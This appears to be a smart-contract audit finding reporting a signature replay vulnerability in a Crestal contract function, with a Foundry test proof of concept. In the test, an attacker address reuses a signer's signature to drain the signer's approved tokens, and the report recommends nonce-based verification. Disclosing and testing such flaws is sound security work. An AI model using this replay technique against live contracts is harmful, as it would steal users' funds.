Mini Sangria Dragonfly

High

# Signature Replay Attack in updateWorkerDeploymentConfigWithSig Allows Unauthorized Fund Draining

### Summary

The `updateWorkerDeploymentConfigWithSig `function can be called multiple times using the same signature as long as the user’s approval remains valid. This enables an attacker to repeatedly drain tokens from the signer’s account without their consent. Since USDC (one of the accepted tokens) does not reset the approval after `transferFrom`, the attack remains viable until the user manually revokes approval.

### Root Cause

**1. Lack of Signature Replay Protection:**
  The function does not verify whether the signature has already been used, allowing it to be reused indefinitely.

**2. Persistent Token Approval:**
  USDC does not reset approvals after `transferFrom`, meaning funds can continuously be drained as long as approval exists.

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/BlueprintCore.sol#L672-L686

### Internal Pre-conditions

-

### External Pre-conditions

-

### Attack Path

-

### Impact

**User Fund Draining:** Attackers can repeatedly call the function using a valid signature until the approval is revoked.

### PoC

```solidity
function test_updateWorkerDeploymentSignatureReplay() public {
    string memory base64Proposal = "test base64 proposal";
    string memory serverURL = "app.crestal.network";

    uint256 signerPrivateKey = 0xA11CE;
    address signer = vm.addr(signerPrivateKey);

    blueprint.addPaymentAddress(address(mockToken));

    blueprint.setCreateAgentTokenCost(address(mockToken), 0);

    vm.prank(signer);
    bytes32 requestId = blueprint.createAgentWithToken(
        projectId,
        base64Proposal,
        workerAddress,
        serverURL,
        address(mockToken)
    );

    uint256 validTokenAmount = 100 * 10 ** 18;

    blueprint.setUpdateCreateAgentTokenCost(
        address(mockToken),
        validTokenAmount
    );

    mockToken.mint(signer, validTokenAmount * 3);

    vm.prank(signer);
    mockToken.approve(address(blueprint), validTokenAmount * 3);

    (bytes memory signature, ) = generateSignature(
        projectId,
        base64Proposal,
        serverURL
    );

    vm.prank(signer);
    blueprint.updateWorkerDeploymentConfigWithSig(
        address(mockToken),
        projectId,
        requestId,
        base64Proposal,
        signature
    );

    //attacker recalling the function multiple times with same signature
    vm.startPrank(makeAddr("attacker"));
    blueprint.updateWorkerDeploymentConfigWithSig(
        address(mockToken),
        projectId,
        requestId,
        base64Proposal,
        signature
    );

    vm.startPrank(makeAddr("attacker"));
    blueprint.updateWorkerDeploymentConfigWithSig(
        address(mockToken),
        projectId,
        requestId,
        base64Proposal,
        signature
    );
}

```

### Mitigation

Implement Nonce-Based Signature Verification